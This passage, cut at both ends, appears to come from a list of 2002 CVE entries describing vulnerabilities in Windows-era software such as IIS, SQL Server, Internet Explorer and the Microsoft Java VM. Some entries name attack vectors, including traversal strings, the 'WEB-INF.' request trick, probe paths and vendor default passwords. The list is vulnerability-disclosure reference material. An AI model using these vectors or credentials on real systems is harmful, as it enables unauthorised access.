scripting is disabled, via an "about:" or "javascript:" URI in the href attribute of an "a" tag. [CVE-2002-2100] Microsoft Outlook 2002 allows remote attackers to embed bypass the file download restrictions for attachments via an HTML email message that uses an IFRAME to reference malicious content. [CVE-2002-2083] The Novell Netware client running on Windows 95 allows local users to bypass the login and open arbitrary files via the "What is this?" help feature, which can be launched from the Novell Netware login screen. [CVE-2002-2081] cphost.dll in Microsoft Site Server 3.0 allows remote attackers to cause a denial of service (disk consumption) via an HTTP POST of a file with a long TargetURL parameter, which causes Site Server to abort and leaves the uploaded file in c:\temp. [CVE-2002-2077] The DCOM client in Windows 2000 before SP3 does not properly clear memory before sending an "alter context" request, which may allow remote attackers to obtain sensitive information by sniffing the session. [CVE-2002-2070] SecureClean 3 build 2.0 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted. [CVE-2002-2069] PGP 6.x and 7.x does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted. [CVE-2002-2068] Eraser 5.3 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted. [CVE-2002-2067] East-Tec Eraser 2002 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted. [CVE-2002-2066] BestCrypt BCWipe 1.0.7 and 2.0 through 2.35.1 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted. [CVE-2002-2062] Cross-site scripting (XSS) vulnerability in ftp.htt in Internet Explorer 5.5 and 6.0, when running on Windows 2000 with "Enable folder view for FTP sites" and "Enable Web content in folders" selected, allows remote attackers to inject arbitrary web script or HTML via the hostname portion of an FTP URL. [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string. [CVE-2002-2028] The screensaver on Windows NT 4.0, 2000, XP, and 2002 does not verify if a domain account has already been locked when a valid password is provided, which makes it easier for users with physical access to conduct brute force password guessing. [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message. [CVE-2002-1981] Microsoft SQL Server 2000 through SQL Server 2000 SP2 allows the "public" role to execute the (1) sp_MSSetServerProperties or (2) sp_MSsetalertinfo stored procedures, which allows attackers to modify configuration including SQL server startup and alert settings. [CVE-2002-1973] Buffer overflow in CHttpServer::OnParseError in the ISAPI extension (Isapi.cpp) when built using Microsoft Foundation Class (MFC) static libraries in Visual C++ 5.0, and 6.0 before SP3, as used in multiple products including BadBlue, allows remote attackers to cause a denial of service (access violation and crash) and possibly execute arbitrary code via a long query string that causes a parsing error. [CVE-2002-1940] LCC-Win32 3.2 compiler, when running on Windows 95, 98, or ME, writes portions of previously used memory after the import table, which could allow attackers to gain sensitive information. NOTE: it has been reported that this problem is due to the OS and not the application. [CVE-2002-1923] The default configuration in MySQL 3.20.32 through 3.23.52, when running on Windows, does not have logging enabled, which could allow remote attackers to conduct activities without detection. [CVE-2002-1921] The default configuration of MySQL 3.20.32 through 3.23.52, when running on Windows, does set the bind address to the loopback interface, which allows remote attackers to connect to the database. [CVE-2002-1918] Buffer overflow in Microsoft Active Data Objects (ADO) in Microsoft MDAC 2.5 through 2.7 allows remote attackers to have unknown impact with unknown attack vectors. NOTE: due to the lack of details available regarding this issue, perhaps it should be REJECTED. [CVE-2002-1908] Microsoft IIS 5.0 and 5.1 allows remote attackers to cause a denial of service (CPU consumption) via an HTTP request with a Host header that contains a large number of "/" (forward slash) characters. [CVE-2002-1876] Microsoft Exchange 2000 allows remote authenticated attackers to cause a denial of service via a large number of rapid requests, which consumes all of the licenses that are granted to Exchange by IIS. [CVE-2002-1875] Entercept Agent 2.5 agent for Windows, released before May 21, 2002, allows local administrative users to obtain the entercept agent password, which could allow the administrators to log on as the entercept_agent account and conceal their identity. [CVE-2002-1873] Microsoft Exchange 2000, when used with Microsoft Remote Procedure Call (MSRPC), allows remote attackers to cause a denial of service (crash or memory consumption) via malformed MSRPC calls. [CVE-2002-1872] Microsoft SQL Server 6.0 through 2000, with SQL Authentication enabled, uses weak password encryption (XOR), which allows remote attackers to sniff and decrypt the password. [CVE-2002-1869] Heysoft EventSave 5.1 and 5.2 and Heysoft EventSave+ 5.1 and 5.2 does not check whether the log file can be written to, which allows attackers to prevent events from being recorded by opening the log file using an application such as Microsoft's Event Viewer. [CVE-2002-1861] Sybase Enterprise Application Server 4.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1860] Pramati Server 3.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1859] Orion Application Server 1.5.3, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1858] Oracle Oracle9i Application Server 1.0.2.2 and 9.0.2 through 9.0.2.0.1, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1857] jo! jo Webserver 1.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1856] HP Application Server 8.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1855] Macromedia JRun 3.0 through 4.0, when running on Windows, allows remote attackers to retrieve files in the WEB-INF directory, which contains Java class files and configuration information, via a request to the WEB-INF directory with a trailing dot ("WEB-INF."). [CVE-2002-1848] TightVNC before 1.2.4 running on Windows stores unencrypted passwords in the password text control of the WinVNC Properties dialog, which could allow local users to access passwords. [CVE-2002-1839] Trend Micro InterScan VirusWall for Windows NT 3.52 does not record the sender's IP address in the headers for a mail message when it is passed from VirusWall to the MTA, which allows remote attackers to hide the origin of the message. [CVE-2002-1833] The default configurations for DocuTech 6110 and DocuTech 6115 have a default administrative password of (1) "service!" on Solaris 8.0 or (2) "administ" on Windows NT, which allows remote attackers to gain privileges. [CVE-2002-1831] Microsoft MSN Messenger Service 1.0 through 4.6 allows remote attackers to cause a denial of service (crash) via an invite request that contains hex-encoded spaces (%20) in the Invitation-Cookie field. [CVE-2002-1824] Microsoft Internet Explorer 6.0, when handling an expired CA-CERT in a webserver's certificate chain during a SSL/TLS handshake, does not prompt the user before searching for and finding a newer certificate, which may allow attackers to perform a man-in-the-middle attack. NOTE: it is not clear whether this poses a vulnerability. [CVE-2002-1817] Unknown vulnerability in Veritas Cluster Server (VCS) 1.2 for WindowsNT, Cluster Server 1.3.0 for Solaris, and Cluster Server 1.3.1 for HP-UX allows attackers to gain privileges via unknown attack vectors. [CVE-2002-1809] The default configuration of the Windows binary release of MySQL 3.23.2 through 3.23.52 has a NULL root password, which could allow remote attackers to gain unauthorized root access to the MySQL database. [CVE-2002-1795] Cross-site scripting (XSS) vulnerability in connect.asp in Microsoft Terminal Services Advanced Client (TSAC) ActiveX control allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2002-1790] The SMTP service in Microsoft Internet Information Services (IIS) 4.0 and 5.0 allows remote attackers to bypass anti-relaying rules and send spam or spoofed messages via encapsulated SMTP addresses, a similar vulnerability to CVE-1999-0682. [CVE-2002-1780] BPM Studio Pro 4.2 by ALCATech GmbH includes a webserver that allows a remote attacker to cause a denial of service (crash) by sending a URL request for a MS-DOS device such as con. NOTE: it has been disputed that this and possibly other application-level DOS device issues stem from a bug in Windows, and as such, such applications should not be considered vulnerable themselves. [CVE-2002-1779] The "block fragmented IP Packets" option in Symantec Norton Personal Firewall 2002 (NPW) does not properly protect against certain attacks on Windows vulnerabilities such as jolt2 (CVE-2000-0305). [CVE-2002-1776] DISPUTED NOTE: this issue has been disputed by the vendor. Symantec Norton AntiVirus 2002 allows remote attackers to bypass virus protection via a Word Macro virus with a .nch or .dbx extension, which is automatically recognized and executed as a Microsoft Office document. NOTE: the vendor has disputed this issue, acknowledging that the initial scan is bypassed, but the Office plug-in would detect the virus before it is executed. [CVE-2002-1770] Qualcomm Eudora 5.1 allows remote attackers to execute arbitrary code via an HTML e-mail message that uses a file:// URL in a t:video tag to reference an attached Windows Media Player file containing JavaScript code, which is launched and executed in the My Computer zone by Internet Explorer. [CVE-2002-1769] Microsoft Site Server 3.0 prior to SP4 installs a default user, LDAP_Anonymous, with a default password of LdapPassword_1, which allows remote attackers the "Log on locally" privilege. [CVE-2002-1762] Microsoft Baseline Security Analyzer (MBSA) 1.0 stores security scans in a known location C:\Documents and Settings\username\SecurityScans in plaintext, which could allow remote attackers to obtain sensitive information about the system via malicious active content such as ActiveX controls or Java. [CVE-2002-1749] Windows 2000 Terminal Services, when using the disconnect feature of the client, does not properly lock itself if it is left idle until the screen saver activates and the user disconnects, which could allow attackers to gain administrator privileges. [CVE-2002-1745] Off-by-one error in the CodeBrws.asp sample script in Microsoft IIS 5.0 allows remote attackers to view the source code for files with extensions containing with one additional character after .html, .htm, .asp, or .inc, such as .aspx files. [CVE-2002-1744] Directory traversal vulnerability in CodeBrws.asp in Microsoft IIS 5.0 allows remote attackers to view source code and determine the existence of arbitrary files via a hex-encoded "%c0%ae%c0%ae" string, which is the Unicode representation for ".." (dot dot). [CVE-2002-1718] Microsoft Internet Information Server (IIS) 5.1 may allow remote attackers to view the contents of a Frontpage Server Extension (FPSE) file, as claimed using an HTTP request for colegal.htm that contains .. (dot dot) sequences. [CVE-2002-1717] Microsoft Internet Information Server (IIS) 5.1 allows remote attackers to view path information via a GET request to (1) /_vti_pvt/access.cnf, (2) /_vti_pvt/botinfs.cnf, (3) /_vti_pvt/bots.cnf, or (4) /_vti_pvt/linkinfo.cnf. [CVE-2002-1716] The Host() function in the Microsoft spreadsheet component on Microsoft Office XP allows remote attackers to create arbitrary files using the SaveAs capability. [CVE-2002-1714] Microsoft Internet Explorer 5.0 through 6.0 allows remote attackers to cause a denial of service (crash) via an object of type "text/html" with the DATA field that identifies the HTML document that contains the object, which may cause infinite recursion. [CVE-2002-1705] Microsoft Internet Explorer 5.5 through 6.0 allows remote attackers to cause a denial of service (crash) via a Cascading Style Sheet (CSS) with the p{cssText} element declared and a bold font weight. [CVE-2002-1698] Buffer overflow in Microsoft MSN Messenger Service 1.0 through 4.6 allows remote attackers to cause a denial of service (crash) via a long FN (font) argument in the message header. [CVE-2002-1696] Microsoft Outlook plug-in PGP version 7.0, 7.0.3, and 7.0.4 silently saves a decrypted copy of a message to hard disk when "Automatically decrypt/verify when opening messages" option is checked, "Always use Secure Viewer when decrypting" option is not checked, and the user replies to an encrypted message. [CVE-2002-1694] Microsoft Internet Information Server (IIS) 4.0 opens log files with FILE_SHARE_READ and FILE_SHARE_WRITE permissions, which could allow remote attackers to modify the log file contents while IIS is running. [CVE-2002-1688] The browser history feature in Microsoft Internet Explorer 5.5 through 6.0 allows remote attackers to execute arbitrary script as other users and steal authentication information via cookies by injecting JavaScript into the URL, which is executed when the user hits the Back button. [CVE-2002-1684] Directory traversal vulnerability in (1) Deerfield D2Gfx 1.0.2 or (2) BadBlue Enterprise Edition 1.5.x and BadBlue Personal Edition 1.5.6 allows remote attackers to read arbitrary files via a ../ (dot dot slash) in the script used to read Microsoft Office documents. [CVE-2002-1671] Microsoft Internet Explorer 5.0, 5.01, and 5.5 allows remote attackers to monitor the contents of the clipboard via the getData method of the clipboardData object. [CVE-2002-1588] Mailtool for OpenWindows 3.6, 3.6.1, and 3.6.2 allows remote attackers to cause a denial of service (mailtool segmentation violation and crash) via a malformed mail attachment. [CVE-2002-1561] The RPC component in Windows 2000, Windows NT 4.0, and Windows XP allows remote attackers to cause a denial of service (disabled RPC service) via a malformed packet to the RPC Endpoint Mapper at TCP port 135, which triggers a null pointer dereference. [CVE-2002-1325] Microsoft Virtual Machine (VM) build 5.0.3805 and earlier allows remote attackers to determine a local user's username via a Java applet that accesses the user.dir system property, aka "User.dir Exposure Vulnerability." [CVE-2002-1295] The Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to cause a denial of service (crash) and possibly conduct other unauthorized activities via applet tags in HTML that bypass Java class restrictions (such as private constructors) by providing the class name in the code parameter, aka "Incomplete Java Object Instantiation Vulnerability." [CVE-2002-1294] The Microsoft Java implementation, as used in Internet Explorer, can provide HTML object references to applets via Javascript, which allows remote attackers to cause a denial of service (crash due to illegal memory accesses) and possibly conduct other unauthorized activities via an applet that uses those references to access proprietary Microsoft methods. [CVE-2002-1293] The Microsoft Java implementation, as used in Internet Explorer, provides a public load0() method for the CabCracker class (com.ms.vm.loader.CabCracker), which allows remote attackers to bypass the security checks that are performed by the load() method. [CVE-2002-1292] The Microsoft Java virtual machine (VM) build 5.0.3805 and earlier, as used in Internet Explorer, allows remote attackers to extend the Standard Security Manager (SSM) class (com.ms.security.StandardSecurityManager) and bypass intended StandardSecurityManager restrictions by modifying the (1) deniedDefinitionPackages or (2) deniedAccessPackages settings, causing a denial of service by adding Java applets to the list of applets that are prevented from running. [CVE-2002-1291] The Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to read arbitrary local files and network shares via an applet tag with a codebase set to a "file://%00" (null character) URL. [CVE-2002-1290] The Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to read and modify the contents of the Clipboard via an applet that accesses the (1) ClipBoardGetText and (2) ClipBoardSetText methods of the INativeServices class. [CVE-2002-1289] The Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to read restricted process memory, cause a denial of service (crash), and possibly execute arbitrary code via the getNativeServices function, which creates an instance of the com.ms.awt.peer.INativeServices (INativeServices) class, whose methods do not verify the memory addresses that are passed as parameters. [CVE-2002-1288] The Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to determine the current directory of the Internet Explorer process via the getAbsolutePath() method in a File() call. [CVE-2002-1287] Stack-based buffer overflow in the Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to cause a denial of service via a long class name through (1) Class.forName or (2) ClassLoader.loadClass. [CVE-2002-1286] The Microsoft Java implementation, as used in Internet Explorer, allows remote attackers to steal cookies and execute script in a different security context via a URL that contains a colon in the domain portion, which is not properly parsed and loads an applet from a malicious site within the security context of the site that is being visited by the user. [CVE-2002-1260] The Java Database Connectivity (JDBC) APIs in Microsoft Virtual Machine (VM) 5.0.3805 and earlier allow remote attackers to bypass security checks and access database contents via an untrusted Java applet. [CVE-2002-1258] Two vulnerabilities in Microsoft Virtual Machine (VM) up to and including build 5.0.3805, as used in Internet Explorer and other applications, allow remote attackers to read files via a Java applet with a spoofed location in the CODEBASE parameter in the APPLET tag, possibly due to a parsing error. [CVE-2002-1257] Microsoft Virtual Machine (VM) up to and including build 5.0.3805 allows remote attackers to execute arbitrary code by including a Java applet that invokes COM (Component Object Model) objects in a web site or an HTML mail. [CVE-2002-1255] Microsoft Outlook 2002 allows remote attackers to cause a denial of service (repeated failure) via an email message with a certain invalid header field that is accessed using POP3, IMAP, or WebDAV, aka "E-mail Header Processing Flaw Could Cause Outlook 2002 to Fail." [CVE-2002-1230] NetDDE Agent on Windows NT 4.0, 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows local users to execute arbitrary code as LocalSystem via "shatter" style attack by sending a WM_COPYDATA message followed by a WM_TIMER message, as demonstrated by GetAd, aka "Flaw in Windows WM_TIMER Message Handling Could Enable Privilege Elevation." [CVE-2002-1181] Multiple cross-site scripting (XSS) vulnerabilities in the administrative web pages for Microsoft Internet Information Server (IIS) 4.0 through 5.1 allow remote attackers to execute HTML script as other users through (1) a certain ASP file in the IISHELP virtual directory, or (2) possibly other unknown attack vectors. [CVE-2002-1179] Buffer overflow in the S/MIME Parsing capability in Microsoft Outlook Express 5.5 and 6.0 allows remote attackers to execute arbitrary code via a digitally signed email with a long "From" address, which triggers the overflow when the user views or previews the message. [CVE-2002-1150] The Remote Desktop Sharing (RDS) Screen Saver Protection capability for Microsoft NetMeeting 3.01 through SP2 (4.4.3396) allows attackers with physical access to hijack remote sessions by entering certain logoff or shutdown sequences (such as CTRL-ALT-DEL) and canceling out of the resulting user confirmation prompts, such as when the remote user is editing a document. [CVE-2002-1145] The xp_runwebtask stored procedure in the Web Tasks component of Microsoft SQL Server 7.0 and 2000, Microsoft Data Engine (MSDE) 1.0, and Microsoft Desktop Engine (MSDE) 2000 can be executed by PUBLIC, which allows an attacker to gain privileges by updating a webtask that is owned by the database owner through the msdb.dbo.mswebtasks table, which does not have strong permissions. [CVE-2002-1143] Microsoft Word and Excel allow remote attackers to steal sensitive information via certain field codes that insert the information when the document is returned to the attacker, as demonstrated in Word using (1) INCLUDETEXT or (2) INCLUDEPICTURE, aka "Flaw in Word Fields and Excel External Updates Could Lead to Information Disclosure." [CVE-2002-1142] Heap-based buffer overflow in the Remote Data Services (RDS) component of Microsoft Data Access Components (MDAC) 2.1 through 2.6, and Internet Explorer 5.01 through 6.0, allows remote attackers to execute code via a malformed HTTP request to the Data Stub. [CVE-2002-1138] Microsoft SQL Server 7.0 and 2000, including Microsoft Data Engine (MSDE) 1.0 and Microsoft Desktop Engine (MSDE) 2000, writes output files for scheduled jobs under its own privileges instead of the entity that launched it, which allows attackers to overwrite system files, aka "Flaw in Output File Handling for Scheduled Jobs." [CVE-2002-1137] Buffer overflow in the Database Console Command (DBCC) that handles user inputs in Microsoft SQL Server 7.0 and 2000, including Microsoft Data Engine (MSDE) 1.0 and Microsoft Desktop Engine (MSDE) 2000, allows attackers to execute arbitrary code via a long SourceDB argument in a "non-SQL OLEDB data source" such as FoxPro, a variant of CAN-2002-0644. [CVE-2002-1123] Buffer overflow in the authentication function for Microsoft SQL Server 2000 and Microsoft Desktop Engine (MSDE) 2000 allows remote attackers to execute arbitrary code via a long request to TCP port 1433, aka the "Hello" overflow. [CVE-2002-1117] Veritas Backup Exec 8.5 and earlier requires that the "RestrictAnonymous" registry key for Microsoft Exchange 2000 must be set to 0, which enables anonymous listing of the SAM database and shares. [CVE-2002-1095] Cisco VPN 3000 Concentrator before 2.5.2(F), with encryption enabled, allows remote attackers to cause a denial of service (reload) via a Windows-based PPTP client with the "No Encryption" option set. [CVE-2002-1056] Microsoft Outlook 2000 and 2002, when configured to use Microsoft Word as the email editor, does not block scripts that are used while editing email messages in HTML or Rich Text Format (RTF), which could allow remote attackers to execute arbitrary scripts via an email that the user forwards or replies to. [CVE-2002-1052] Jigsaw 2.2.1 on Windows systems allows remote attackers to use MS-DOS device names in HTTP requests to (1) cause a denial of service using the "con" device, or (2) obtain the physical path of the server using two requests to the "aux" device. [CVE-2002-1042] Directory traversal vulnerability in search engine for iPlanet web server 6.0 SP2 and 4.1 SP9, and Netscape Enterprise Server 3.6, when running on Windows platforms, allows remote attackers to read arbitrary files via ..\ (dot-dot backslash) sequences in the NS-query-pat parameter. [CVE-2002-1029] Res Manager in Worldspan for Windows Gateway 4.1 allows remote attackers to cause a denial of service (crash) via a malformed request to TCP port 17990. [CVE-2002-1015] RealJukebox 2 1.0.2.340 and 1.0.2.379, and RealOne Player Gold 6.0.10.505, allows remote attackers to execute arbitrary script in the Local computer zone by inserting the script into the skin.ini file of an RJS archive, then referencing skin.ini from a web page after it has been extracted, which is parsed as HTML by Internet Explorer or other Microsoft-based web readers. [CVE-2002-0982] Microsoft SQL Server 2000 SP2, when configured as a distributor, allows attackers to execute arbitrary code via the @scriptfile parameter to the sp_MScopyscript stored procedure. [CVE-2002-0978] Microsoft File Transfer Manager (FTM) ActiveX control before 4.0 allows remote attackers to upload or download arbitrary files to arbitrary locations via a man-in-the-middle attack with modified TGT and TGN parameters in a call to the "Persist" function. [CVE-2002-0977] Buffer overflow in Microsoft File Transfer Manager (FTM) ActiveX control before 4.0 allows remote attackers to execute arbitrary code via a long TS value. [CVE-2002-0975] Buffer overflow in Microsoft DirectX Files Viewer ActiveX control (xweb.ocx) 2.0.6.15 and earlier allows remote attackers to execute arbitrary via a long File parameter. [CVE-2002-0974] Help and Support Center for Windows XP allows remote attackers to delete arbitrary files via a link to the hcp: protocol that accesses uplddrvinfo.htm. [CVE-2002-0969] Buffer overflow in MySQL daemon (mysqld) before 3.23.50, and 4.0 beta before 4.02, on the Win32 platform, allows local users to execute arbitrary code via a long "datadir" parameter in the my.ini initialization file, whose permissions on Windows allow Full Control to the Everyone group. [CVE-2002-0965] Buffer overflow in TNS Listener for Oracle 9i Database Server on Windows systems, and Oracle 8 on VM, allows local users to execute arbitrary code via a long SERVICE_NAME parameter, which is not properly handled when writing an error message to a log file. [CVE-2002-0869] Unknown vulnerability in the hosting process (dllhost.exe) for Microsoft Internet Information Server (IIS) 4.0 through 5.1 allows remote attackers to gain privileges by executing an out of process application that acquires LocalSystem privileges, aka "Out of Process Privilege Elevation." [CVE-2002-0867] Microsoft Virtual Machine (VM) up to and including build 5.0.3805 allows remote attackers to cause a denial of service (crash) in Internet Explorer via invalid handle data in a Java applet, aka "Handle Validation Flaw." [CVE-2002-0866] Java Database Connectivity (JDBC) classes in Microsoft Virtual Machine (VM) up to and including 5.0.3805 allow remote attackers to load and execute DLLs (dynamic link libraries) via a Java applet that calls the constructor for com.ms.jdbc.odbc.JdbcOdbc with the desired DLL terminated by a null string, aka "DLL Execution via JDBC Classes." [CVE-2002-0865] A certain class that supports XML (Extensible Markup Language) in Microsoft Virtual Machine (VM) 5.0.3805 and earlier, probably com.ms.osp.ospmrshl, exposes certain unsafe methods, which allows remote attackers to execute unsafe code via a Java applet, aka "Inappropriate Methods Exposed in XML Support Classes." [CVE-2002-0861] Microsoft Office Web Components (OWC) 2000 and 2002 allows remote attackers to bypass the "Allow paste operations via script" setting, even when it is disabled, via the (1) Copy method of the Cell object or (2) the Paste method of the Range object. [CVE-2002-0860] The LoadText method in the spreadsheet component in Microsoft Office Web Components (OWC) 2000 and 2002 allows remote attackers to read arbitrary files through Internet Explorer via a URL that redirects to the target file. [CVE-2002-0859] Buffer overflow in the OpenDataSource function of the Jet engine on Microsoft SQL Server 2000 allows remote attackers to execute arbitrary code. [CVE-2002-0833] Buffer overflow in Eudora 5.1.1 and 5.0-J for Windows, and possibly other versions, allows remote attackers to execute arbitrary code via a multi-part message with a long boundary string. [CVE-2002-0795] The rc system startup script for FreeBSD 4 through 4.5 allows local users to delete arbitrary files via a symlink attack on X Windows lock files. [CVE-2002-0788] An interaction between PGP 7.0.3 with the "wipe deleted files" option, when used on Windows Encrypted File System (EFS), creates a cleartext temporary files that cannot be wiped or deleted due to strong permissions, which could allow certain local users or attackers with physical access to obtain cleartext information. [CVE-2002-0736] Microsoft BackOffice 4.0 and 4.5, when configured to be accessible by other systems, allows remote attackers to bypass authentication and access the administrative ASP pages via an HTTP request with an authorization type (auth_type) that is not blank. [CVE-2002-0729] Microsoft SQL Server 2000 allows remote attackers to cause a denial of service via a malformed 0x08 packet that is missing a colon separator. [CVE-2002-0727] The Host function in Microsoft Office Web Components (OWC) 2000 and 2002 is exposed in components that are marked as safe for scripting, which allows remote attackers to execute arbitrary commands via the setTimeout method. [CVE-2002-0726] Buffer overflow in Microsoft Terminal Services Advanced Client (TSAC) ActiveX control allows remote attackers to execute arbitrary code via a long server name field. [CVE-2002-0725] NTFS file system in Windows NT 4.0 and Windows 2000 SP2 allows local attackers to hide file usage activities via a hard link to the target file, which causes the link to be recorded in the audit trail instead of the target file. [CVE-2002-0723] Microsoft Internet Explorer 5.5 and 6.0 does not properly verify the domain of a frame within a browser window, which allows remote attackers to read client files or invoke executable objects via the Object tag, aka "Cross Domain Verification in Object Tag." [CVE-2002-0722] Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to misrepresent the source of a file in the File Download dialogue box to trick users into thinking that the file type is safe to download, aka "File Origin Spoofing." [CVE-2002-0721] Microsoft SQL Server 7.0 and 2000 installs with weak permissions for extended stored procedures that are associated with helper functions, which could allow unprivileged users, and possibly remote attackers, to run stored procedures with administrator privileges via (1) xp_execresultset, (2) xp_printstatements, or (3) xp_displayparamstmt. [CVE-2002-0720] A handler routine for the Network Connection Manager (NCM) in Windows 2000 allows local users to gain privileges via a complex attack that causes the handler to run in the LocalSystem context with user-specified code. [CVE-2002-0719] SQL injection vulnerability in the function that services for Microsoft Content Management Server (MCMS) 2001 allows remote attackers to execute arbitrary commands via an MCMS resource request for image files or other files. [CVE-2002-0718] Web authoring command in Microsoft Content Management Server (MCMS) 2001 allows attackers to authenticate and upload executable content, by modifying the upload location, aka "Program Execution via MCMS Authoring Function." [CVE-2002-0700] Buffer overflow in a system function that performs user authentication for Microsoft Content Management Server (MCMS) 2001 allows attackers to execute code in the Local System context by authenticating to a web page that calls the function, aka "Unchecked Buffer in MDAC Function Could Enable SQL Server Compromise." [CVE-2002-0698] Buffer overflow in Internet Mail Connector (IMC) for Microsoft Exchange Server 5.5 allows remote attackers to execute arbitrary code via an EHLO request from a system with a long name as obtained through a reverse DNS lookup, which triggers the overflow in IMC's hello response. [CVE-2002-0697] Microsoft Metadirectory Services (MMS) 2.2 allows remote attackers to bypass authentication and modify sensitive data by using an LDAP client to directly connect to MMS and bypass the checks for MMS credentials. [CVE-2002-0696] Microsoft Visual FoxPro 6.0 does not register its associated files with Internet Explorer, which allows remote attackers to execute Visual FoxPro applications without warning via HTML that references specially-crafted filenames. [CVE-2002-0695] Buffer overflow in the Transact-SQL (T-SQL) OpenRowSet component of Microsoft Data Access Components (MDAC) 2.5 through 2.7 for SQL Server 7.0 or 2000 allows remote attackers to execute arbitrary code via a query that calls the OpenRowSet command. [CVE-2002-0692] Buffer overflow in SmartHTML Interpreter (shtml.dll) in Microsoft FrontPage Server Extensions (FPSE) 2000 and 2002 allows remote attackers to cause a denial of service (CPU consumption) or run arbitrary code, respectively, via a certain type of web file request. [CVE-2002-0691] Microsoft Internet Explorer 5.01 and 5.5 allows remote attackers to execute scripts in the Local Computer zone via a URL that references a local HTML resource file, a variant of "Cross-Site Scripting in Local HTML Resource" as identified by CAN-2002-0189. [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters. [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked. [CVE-2002-0650] The keep-alive mechanism for Microsoft SQL Server 2000 allows remote attackers to cause a denial of service (bandwidth consumption) via a "ping" style packet to the Resolution Service (UDP port 1434) with a spoofed IP address of another SQL Server system, which causes the two servers to exchange packets in an infinite loop. [CVE-2002-0649] Multiple buffer overflows in the Resolution Service for Microsoft SQL Server 2000 and Microsoft Desktop Engine 2000 (MSDE) allow remote attackers to cause a denial of service or execute arbitrary code via UDP packets to port 1434 in which (1) a 0x04 byte that causes the SQL Monitor thread to generate a long registry key name, or (2) a 0x08 byte with a long string causes heap corruption, as exploited by the Slammer/Sapphire worm. [CVE-2002-0648] The legacy <script> data-island capability for XML in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to read arbitrary XML files, and portions of other files, via a URL whose "src" attribute redirects to a local file. [CVE-2002-0647] Buffer overflow in a legacy ActiveX control used to display specially formatted text in Microsoft Internet Explorer 5.01, 5.5, and 6.0 allows remote attackers to execute arbitrary code, aka "Buffer Overrun in Legacy Text Formatting ActiveX Control". [CVE-2002-0645] SQL injection vulnerability in stored procedures for Microsoft SQL Server 2000 and Microsoft Desktop Engine (MSDE) 2000 may allow authenticated users to execute arbitrary commands. [CVE-2002-0644] Buffer overflow in several Database Consistency Checkers (DBCCs) for Microsoft SQL Server 2000 and Microsoft Desktop Engine (MSDE) 2000 allows members of the db_owner and db_ddladmin roles to execute arbitrary code. [CVE-2002-0643] The installation of Microsoft Data Engine 1.0 (MSDE 1.0), and Microsoft SQL Server 2000 creates setup.iss files with insecure permissions and does not delete them after installation, which allows local users to obtain sensitive data, including weakly encrypted passwords, to gain privileges, aka "SQL Server Installation Process May Leave Passwords on System." [CVE-2002-0642] The registry key containing the SQL Server service account information in Microsoft SQL Server 2000, including Microsoft SQL Server Desktop Engine (MSDE) 2000, has insecure permissions, which allows local users to gain privileges, aka "Incorrect Permission on SQL Server Service Account Registry Key." [CVE-2002-0641] Buffer overflow in bulk insert procedure of Microsoft SQL Server 2000, including Microsoft SQL Server Desktop Engine (MSDE) 2000, allows attackers with database administration privileges to execute arbitrary code via a long filename in the BULK INSERT query. [CVE-2002-0624] Buffer overflow in the password encryption function of Microsoft SQL Server 2000, including Microsoft SQL Server Desktop Engine (MSDE) 2000, allows remote attackers to gain control of the database and execute arbitrary code via SQL Server Authentication, aka "Unchecked Buffer in Password Encryption Procedure." [CVE-2002-0623] Buffer overflow in AuthFilter ISAPI filter on Microsoft Commerce Server 2000 and 2002 allows remote attackers to execute arbitrary code via long authentication data, aka "New Variant of the ISAPI Filter Buffer Overrun". [CVE-2002-0622] The Office Web Components (OWC) package installer for Microsoft Commerce Server 2000 allows remote attackers to execute commands by passing the commands as input to the OWC package installer, aka "OWC Package Command Execution". [CVE-2002-0621] Buffer overflow in the Office Web Components (OWC) package installer used by Microsoft Commerce Server 2000 allows remote attackers to cause the process to fail or run arbitrary code in the LocalSystem security context via certain input to the OWC package installer. [CVE-2002-0620] Buffer overflow in the Profile Service of Microsoft Commerce Server 2000 allows remote attackers to cause the 